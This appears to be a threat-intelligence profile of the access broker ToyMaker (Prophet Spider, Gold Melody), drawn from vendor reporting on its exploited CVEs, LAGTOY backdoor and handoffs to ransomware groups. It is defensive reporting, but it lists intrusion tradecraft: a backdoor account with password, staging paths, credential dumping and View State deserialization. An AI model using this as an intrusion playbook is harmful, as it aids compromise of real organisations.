ToyMaker

ToyMaker is a financially motivated initial access broker (IAB), also described by Cisco Talos as a financially motivated initial access group, active against vulnerable internet-facing systems. Known aliases include GoldMelody / GOLD MELODY, UNC961, Prophet Spider, and TGR-CRI-0045; Unit 42 attributed TGR-CRI-0045 to Gold Melody (aka UNC961, Prophet Spider) with medium confidence, and BlackBerry correlated Prophet Spider activity with exploitation of Log4j in VMware Horizon. The group has been active since at least 2017 in reporting on Gold Melody / Prophet Spider. ToyMaker has been observed exploiting known vulnerabilities in public-facing infrastructure, including Oracle WebLogic Server flaws such as CVE-2020-14882, CVE-2020-14750, and older WebLogic CVEs including CVE-2016-0545, as well as SQL injection, vulnerable internet-facing servers, VMware Horizon systems exposed to Log4Shell-related vulnerabilities, and ASP.NET IIS servers through leaked Machine Keys and View State deserialization. Unit 42 reported that TGR-CRI-0045 targeted organizations in Europe and the United States, including financial services, manufacturing, wholesale/retail, high technology, and transportation/logistics. Talos also noted ToyMaker targeting high-value organizations including critical infrastructure. Talos reported that in a 2023 critical infrastructure intrusion, ToyMaker exploited vulnerable internet-facing systems, conducted preliminary reconnaissance, created a fake local administrator account named support, enabled or used Windows OpenSSH components, executed Magnet RAM Capture to dump memory, archived the dumps with 7za.exe, exfiltrated them with pscp.exe, and deployed the custom reverse-shell backdoor LAGTOY. Mandiant reported the same backdoor family as HOLERUN. Talos observed LAGTOY persisted as a Windows service named WmiPrvSV, communicated with a hard-coded C2 over TCP/443 using raw sockets rather than TLS, and included anti-debugging and time-based execution logic. Talos assessed that ToyMaker harvested credentials from memory and later transferred access to Cactus, which used those credentials after roughly three weeks. ToyMaker has been observed handing off access to multiple ransomware groups. Talos stated ToyMaker transferred access to Maze, Egregor, and Cactus. Reporting on Prophet Spider assessed that it likely functioned as an access broker and likely granted access to Egregor and MountLocker operators. Cisco Talos specifically described ToyMaker passing access to secondary threat actors, most notably the Cactus group. Unit 42 reported that TGR-CRI-0045 used forged ASP.NET View State payloads signed with exposed Machine Keys to execute malicious .NET assemblies directly in memory via w3wp.exe, minimizing on-disk artifacts. Observed activity included use of C:\Windows\Temp\111t as a staging directory, retrieval of tooling via curl, reflective loading of .NET assemblies, reconnaissance commands, use of the custom privilege-escalation tool updf leveraging GodPotato to obtain SYSTEM, creation of local administrator accounts such as support:Sup0rt_1!admin, export of web.config files, and use of the Golang port scanner TxPortMap. BlackBerry linked Prophet Spider to VMware Horizon Log4Shell exploitation, where ws_TomcatService.exe spawned cmd.exe or powershell.exe, often followed by encoded PowerShell download cradles. Observed post-exploitation included host and domain enumeration, dumping SAM, SYSTEM, and SECURITY hives, use of C:\Windows\Temp\7fde\ as a staging directory, downloading wget.bin and additional payloads, and in some cases deployment of cryptocurrency miners or Cobalt Strike. BlackBerry described Prophet Spider as an IAB known for selling access to ransomware operators. The group’s tradecraft across reporting includes exploitation of internet-facing applications, credential harvesting, creation of unauthorized local accounts, reconnaissance, privilege escalation, persistence through services or scheduled tasks, in-memory execution, and transfer of access to downstream ransomware actors.